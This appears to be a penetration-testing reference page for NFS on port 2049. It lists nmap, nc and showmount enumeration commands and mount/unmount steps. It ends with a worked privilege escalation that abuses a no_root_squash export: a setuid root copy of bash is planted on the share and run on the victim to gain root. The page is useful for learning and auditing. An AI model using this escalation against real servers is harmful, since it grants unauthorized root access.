2049 - NFS
Information
Default Port: 2049
PORT STATE SERVICE
2049/tcp open nfs
Enumeration
# Confirm that the NFS port answers before running heavier checks.
target=192.168.1.2
port=2049

# Plain TCP connect: -n skips DNS lookups, -v reports the connection result.
nc -nv "$target" "$port"
# Same probe, cut off after 0.1 s so a silent service cannot hang the shell.
timeout 0.1 bash -c "nc -nv $target $port"

# SYN scan of the single port (uses raw sockets, so it normally needs root).
nmap -sS -p "$port" "$target"
# Version detection plus the default NSE script set.
nmap -sV -sC -p "$port" "$target"
# Every NSE script whose name starts with nfs- (nfs-ls, nfs-showmount, nfs-statfs).
nmap -p "$port" --script 'nfs-*' "$target"
# Only the export list, via the nfs-showmount script.
nmap -sV --script=nfs-showmount "$target"
Directory
List
# showmount ships with the NFS client tools
# (Debian/Ubuntu: apt-get install -y nfs-common).
# List what the server exports. A client column of * means every host that
# can reach the server is allowed to mount that path.
showmount --exports 192.168.1.2
Export list for 192.168.1.2:
/var/www/html *
Mount
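# Mount the export on a scratch directory for inspection.
cd /dev/shm
mkdir nfs
# Mount options must follow -o. With util-linux mount the clustered form
# "-nolock" is parsed as "-n -o lock", so locking is not actually disabled.
# On an analysis host, consider adding nosuid,nodev,noexec to the -o list so
# nothing stored on the untrusted export can run with privilege locally.
mount -t nfs -o nolock 192.168.1.2:/var/www/html /dev/shm/nfs
cd nfs
ls -l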
Umount
# Normal unmount. Leave the mount point first (cd /), otherwise it is busy.
umount /dev/shm/nfs
# If umount still reports the target as busy, use one of the following.
# Lazy unmount: detach now, finish the cleanup once nothing uses the mount.
umount --lazy /dev/shm/nfs
# Forced unmount: meant for an NFS server that has become unreachable.
umount --force /dev/shm/nfs
Files
/etc/exports
/var/lib/nfs/etab
Privilege Escalation
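no_root_squash
By default (root_squash) an NFS server maps requests from a client's uid 0 to an unprivileged anonymous account. An export marked no_root_squash skips that mapping, so root on any permitted client acts as root on the exported files. Keep root_squash, restrict the client list instead of using *, and avoid rw where it is not needed.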
Detect
low@lower3:/$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/var/www/html/ *(rw,sync,insecure,no_root_squash,no_subtree_check)
Abuse
Victim
low@lower3:/$ cd /var/www/html/
low@lower3:/var/www/html$ cp /usr/bin/bash .
Attacker
❯ chown root:root bash
❯ chmod 4755 bash
Victim
low@lower3:/var/www/html$ ./bash -p
bash-5.1# id ; hostname
uid=1000(low) gid=1000(low) euid=0(root) groups=1000(low)